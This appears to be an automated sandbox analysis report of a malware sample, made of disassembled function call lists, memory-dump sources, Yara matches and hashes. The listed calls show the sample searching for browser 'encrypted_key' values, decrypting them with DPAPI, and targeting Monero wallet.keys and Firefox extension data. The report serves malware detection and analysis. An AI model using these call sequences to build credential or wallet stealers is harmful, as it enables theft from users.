                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                                • Part of subcall function 00FC8B60: GetSystemTime.KERNEL32(00FD0E1A,00DED7F0,00FD05AE,?,?,00FB13F9,?,0000001A,00FD0E1A,00000000,?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FC8B86
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FBD801
                              • lstrlen.KERNEL32(00000000), ref: 00FBD99F
                              • lstrlen.KERNEL32(00000000), ref: 00FBD9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 00FBDA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              APIs
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                                • Part of subcall function 00FB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FB99EC
                                • Part of subcall function 00FB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FB9A11
                                • Part of subcall function 00FB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FB9A31
                                • Part of subcall function 00FB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FB148F,00000000), ref: 00FB9A5A
                                • Part of subcall function 00FB99C0: LocalFree.KERNEL32(00FB148F), ref: 00FB9A90
                                • Part of subcall function 00FB99C0: CloseHandle.KERNEL32(000000FF), ref: 00FB9A9A
                                • Part of subcall function 00FC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FC8E52
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00FD1580,00FD0D92), ref: 00FBF54C
                              • lstrlen.KERNEL32(00000000), ref: 00FBF56B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FB99EC
                                • Part of subcall function 00FB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FB9A11
                                • Part of subcall function 00FB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FB9A31
                                • Part of subcall function 00FB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FB148F,00000000), ref: 00FB9A5A
                                • Part of subcall function 00FB99C0: LocalFree.KERNEL32(00FB148F), ref: 00FB9A90
                                • Part of subcall function 00FB99C0: CloseHandle.KERNEL32(000000FF), ref: 00FB9A9A
                                • Part of subcall function 00FC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FC8E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00FB9D39
                                • Part of subcall function 00FB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FB4EEE,00000000,00000000), ref: 00FB9AEF
                                • Part of subcall function 00FB9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00FB4EEE,00000000,?), ref: 00FB9B01
                                • Part of subcall function 00FB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FB4EEE,00000000,00000000), ref: 00FB9B2A
                                • Part of subcall function 00FB9AC0: LocalFree.KERNEL32(?,?,?,?,00FB4EEE,00000000,?), ref: 00FB9B3F
                                • Part of subcall function 00FB9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00FB9B84
                                • Part of subcall function 00FB9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00FB9BA3
                                • Part of subcall function 00FB9B60: LocalFree.KERNEL32(?), ref: 00FB9BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: 84d50258c54a1995242f434ef7d3687d31aa88695a1080e375b260b74feba9a5
                              • Instruction ID: 49a00196cf019c1442d28c1048bcfe9e04f42d2dd4071992120c48001b56db6e
                              • Opcode Fuzzy Hash: 84d50258c54a1995242f434ef7d3687d31aa88695a1080e375b260b74feba9a5
                              • Instruction Fuzzy Hash: 7B317CB6D00209ABCF04DFE5DD86EEEB7B8BF48304F144519EA01A3241EB749A04DBA1
                              APIs
                              • CreateFileA.KERNEL32(00FC3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00FC3AEE,?), ref: 00FC92FC
                              • GetFileSizeEx.KERNEL32(000000FF,00FC3AEE), ref: 00FC9319
                              • CloseHandle.KERNEL32(000000FF), ref: 00FC9327
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: e6d2f9fb9f92240eb22bd8c05a3bf0ff79f68253756f3e6a63c813f0a6ef57e9
                              • Instruction ID: 434f8857262482add88784a44beb2b3318054ad78dc63fc63b7dfa9eb5fe76f3
                              • Opcode Fuzzy Hash: e6d2f9fb9f92240eb22bd8c05a3bf0ff79f68253756f3e6a63c813f0a6ef57e9
                              • Instruction Fuzzy Hash: A8F0A435E04204BBDB24DFB0ED49F9E77F9AB48320F10C658B615A71C4D7B5A6419F40
                              APIs
                              • __getptd.LIBCMT ref: 00FCC74E
                                • Part of subcall function 00FCBF9F: __amsg_exit.LIBCMT ref: 00FCBFAF
                              • __getptd.LIBCMT ref: 00FCC765
                              • __amsg_exit.LIBCMT ref: 00FCC773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00FCC797
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 189a001369ec40fbfb189ea411e583d18e8c2a311d9de4f0bd41e63b45e901ed
                              • Instruction ID: e44d59ee04860fd7b8ef20eaa497dcf880ee81561addbb3592c7221c4490ee5d
                              • Opcode Fuzzy Hash: 189a001369ec40fbfb189ea411e583d18e8c2a311d9de4f0bd41e63b45e901ed
                              • Instruction Fuzzy Hash: F0F06D36D052079BDB21BFB85E07F5D37A0AF00724F25414DF418A62D2DB685940FE96
                              APIs
                                • Part of subcall function 00FC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FC8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00FC4F7A
                              • lstrcat.KERNEL32(?,00FD1070), ref: 00FC4F97
                              • lstrcat.KERNEL32(?,00DE8DA8), ref: 00FC4FAB
                              • lstrcat.KERNEL32(?,00FD1074), ref: 00FC4FBD
                                • Part of subcall function 00FC4910: wsprintfA.USER32 ref: 00FC492C
                                • Part of subcall function 00FC4910: FindFirstFileA.KERNEL32(?,?), ref: 00FC4943
                                • Part of subcall function 00FC4910: StrCmpCA.SHLWAPI(?,00FD0FDC), ref: 00FC4971
                                • Part of subcall function 00FC4910: StrCmpCA.SHLWAPI(?,00FD0FE0), ref: 00FC4987
                                • Part of subcall function 00FC4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00FC4B7D
                                • Part of subcall function 00FC4910: FindClose.KERNEL32(000000FF), ref: 00FC4B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 2d375f0c279aaf0fa5be937e5b92d281f7019e298bb4b00aa7eb6874566c908a
                              • Instruction ID: a01b349b13e2008086b99d12f77d1b03e12d7afa07ba86e3118ab4a7ac174515
                              • Opcode Fuzzy Hash: 2d375f0c279aaf0fa5be937e5b92d281f7019e298bb4b00aa7eb6874566c908a
                              • Instruction Fuzzy Hash: C521A47690020867C768FBA0EC46FE9333CAB54700F00455CB65D97185EEBCAAC99BA2